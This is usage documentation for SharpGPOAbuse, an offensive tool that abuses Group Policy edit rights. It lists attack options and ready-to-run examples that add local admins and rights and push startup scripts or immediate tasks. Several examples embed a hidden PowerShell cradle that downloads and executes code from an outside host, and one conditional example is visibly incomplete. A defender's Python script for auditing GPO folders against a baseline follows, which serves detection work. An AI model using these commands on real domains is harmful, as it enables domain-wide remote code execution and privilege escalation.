SharpGPOAbuse : Tool To Take Advantage Of A User’s Edit Rights On A Group Policy Object (GPO)

SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user’s edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.

More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse

Compile Instructions

Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.

Usage

Usage: SharpGPOAbuse.exe <AttackType> <AttackOptions>

Attack Types

Currently SharpGPOAbuse supports the following options:

Option                Description
--AddUserRights       Add rights to a user
--AddLocalAdmin       Add a user to the local admins group
--AddComputerScript   Add a new computer startup script
--AddUserScript       Configure a user logon script
--AddComputerTask     Configure a computer immediate task
--AddUserTask         Add an immediate task to a user

Attack Options

  • Adding User Rights

Options required to add new user rights:
--UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separated list must be used.
--UserAccount
Set the account to add the new rights.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"

  • Adding a Local Admin

Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"

  • Configuring a User or Computer Logon Script

Options required to add a new user or computer startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.

Example:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:

SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%== powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

  • Configuring a Computer or User Immediate Task

Options required to add a new computer or user immediate task:

--TaskName
Set the name of the new computer task.
--Author
Set the author of the new task (use a DA account).
--Command
Command to execute.
--Arguments
Arguments passed to the command.
--GPOName
The name of the vulnerable GPO.

Additional User Task Options:

--FilterEnabled
Enable Target Filtering for user immediate tasks.
--TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format \
--TargetUserSID
The targeted user’s SID.

Additional Computer Task Options:

--FilterEnabled
Enable Target Filtering for computer immediate tasks.
--TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.

Example:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"

If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:

SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com

Additional Options

Option               Description
--DomainController   Set the target domain controller
--Domain             Set the target domain
--Force              Overwrite existing files if required
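
For defenders, each attack type listed above leaves a setting in the GPO's SYSVOL folder. The following is an added example, not part of SharpGPOAbuse or the original post: it walks a read-only copy of one GPO folder and lists user-rights assignments, restricted-group membership, startup/logon scripts and immediate tasks so they can be compared against a known-good baseline. The function names (scan_gpo, read_ini, build_sample) and the sample folder, SID and task name are constructed for illustration; the file and section names are the standard Group Policy ones.

```python
import configparser, tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
INF_SECTIONS = {"Privilege Rights": "user-right", "Group Membership": "group-membership"}

def read_ini(path):
    raw = path.read_bytes()
    # interpolation=None: a value such as %username% must stay literal, not a template.
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep the case of privilege names
    # GptTmpl.inf and scripts.ini are normally UTF-16 with a BOM; otherwise assume UTF-8.
    cp.read_string(raw.decode("utf-16" if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8-sig"))
    return cp

def scan_gpo(gpo_dir):  # returns sorted (kind, detail) pairs to review against a baseline
    out = []
    for path in Path(gpo_dir).rglob("*"):
        low = path.name.lower()
        if low == "gpttmpl.inf":
            cp = read_ini(path)
            for sec, kind in INF_SECTIONS.items():
                if cp.has_section(sec):
                    out += [(kind, f"{k}={v}") for k, v in cp[sec].items()]
        elif low == "scripts.ini":
            out += [("script", f"{sec}:{v}") for sec, opts in read_ini(path).items()
                    for k, v in opts.items() if k.endswith("CmdLine")]
        elif low == "scheduledtasks.xml":
            for task in ET.parse(path).getroot().iter():
                if task.tag.startswith("ImmediateTask"):  # ImmediateTask / ImmediateTaskV2
                    out.append(("immediate-task", f"{task.get('name')}:{task.findtext('.//Command')}"))
    return sorted(out)

def build_sample(base):
    # Constructed sample; SID and names made up. *S-1-5-32-544 is BUILTIN\Administrators.
    inf = ("[Privilege Rights]\r\nSeTakeOwnershipPrivilege = *S-1-5-21-1-2-3-1104\r\n"
           "[Group Membership]\r\n*S-1-5-32-544__Members = *S-1-5-21-1-2-3-1104\r\n")
    ini = "[Logon]\r\n0CmdLine=StartupScript.bat\r\n0Parameters=\r\n"
    xml = ('<ScheduledTasks><ImmediateTaskV2 name="Update"><Properties><Task><Actions><Exec><Command>'
           "cmd.exe</Command></Exec></Actions></Task></Properties></ImmediateTaskV2></ScheduledTasks>")
    for rel, enc, text in (("Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf", "utf-16", inf),
                           ("User/Scripts/scripts.ini", "utf-16", ini),
                           ("Machine/Preferences/ScheduledTasks/ScheduledTasks.xml", "utf-8", xml)):
        target = Path(base, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(text.encode(enc))
    return base

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(*scan_gpo(build_sample(tmp)), sep="\n")
```

Legitimate policies also contain these settings, so the output is a list to diff against the previous state of the same GPO rather than a verdict.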
R K